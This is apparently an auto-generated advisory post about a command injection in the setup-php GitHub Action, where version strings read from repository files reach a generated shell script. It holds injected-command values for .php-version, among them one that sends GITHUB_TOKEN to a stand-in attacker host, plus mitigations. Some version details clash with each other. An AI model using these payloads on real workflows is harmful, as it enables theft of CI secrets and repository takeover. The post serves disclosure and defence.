Listen to this Post
How the mentioned CVE works:
The vulnerability exists in `shivammathur/setup-php` GitHub Action when it resolves the PHP version from repository-controlled files without proper sanitization. An attacker can plant malicious version strings in files like .php-version, `composer.lock` (via platform-overrides.php), or `composer.json` (via config.platform.php). When a privileged workflow (e.g., pull_request_target) checks out attacker-controlled code and then invokes setup-php, the action reads the version from these files. That unsanitized string is embedded directly into a generated shell or PowerShell setup script executed on the GitHub Actions runner. By injecting command separators (e.g., ;, &&, |, $()), an attacker can break out of the version context and run arbitrary commands. The runner executes these commands with the workflow’s privileges, enabling code exfiltration, credential theft, or lateral movement. The issue is most severe when `setup-php` runs in a trusted context after checking out untrusted PR code, as no additional authentication is required. Versions prior to the patch allowed unconstrained concatenation of the version string into the script template, with no validation against expected version format (e.g., 7.4, 8.1). The fix introduces strict input validation, constrains characters allowed in manifest-derived versions, and hardens the script generation pipeline to escape or reject malicious payloads.
dailycve form:
Platform: GitHub Actions
Version: <=2.25.4 (fixed)
Vulnerability: Command Injection
Severity: Critical
Date: 2024-03-01
Prediction: Patch 2024-03-15
What Undercode Say:
Check if action version is vulnerable grep -E 'shivammathur/setup-php@v2.[0-2]' .github/workflows/.yml Simulate malicious .php-version in attacker PR echo '8.1; whoami > /tmp/pwned' > .php-version git add .php-version && git commit -m 'test' && git push Verify command injection via debug log cat /tmp/pwned runner user name appears if vulnerable
Exploit:
- Attacker forks repo, creates PR with `.php-version` containing
7.4 && curl attacker.com/steal?token=$GITHUB_TOKEN. - Target repo uses `pull_request_target` workflow that checks out PR code then runs
setup-php. - Action reads poisoned version, generates setup script line like
install-php "7.4 && curl ...". - Shell executes the injected command, sending runner’s `GITHUB_TOKEN` to attacker.
- Attacker uses token to push to protected branches or exfiltrate secrets.
Protection from this CVE
- Upgrade to `shivammathur/[email protected]` or later (or any `@v2` after March 2024).
- Avoid using `pull_request_target` with untrusted code checkout before version resolution.
- Pin action by SHA (
shivammathur/setup-php@<fixed-sha>) instead of version tag. - Set `php-version` input explicitly instead of relying on repository files.
- Use `actions/checkout` with `persist-credentials: false` and restrict token permissions.
Impact
- Full command execution on GitHub Actions runner.
- Leakage of repository secrets, including
GITHUB_TOKEN,GH_TOKEN, and deployment keys. - Attacker can modify repository content, create releases, or poison build artifacts.
- In self-hosted runners, pivoting to internal network or host compromise.
- Privilege escalation from `pull_request_target` workflow to repository write access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

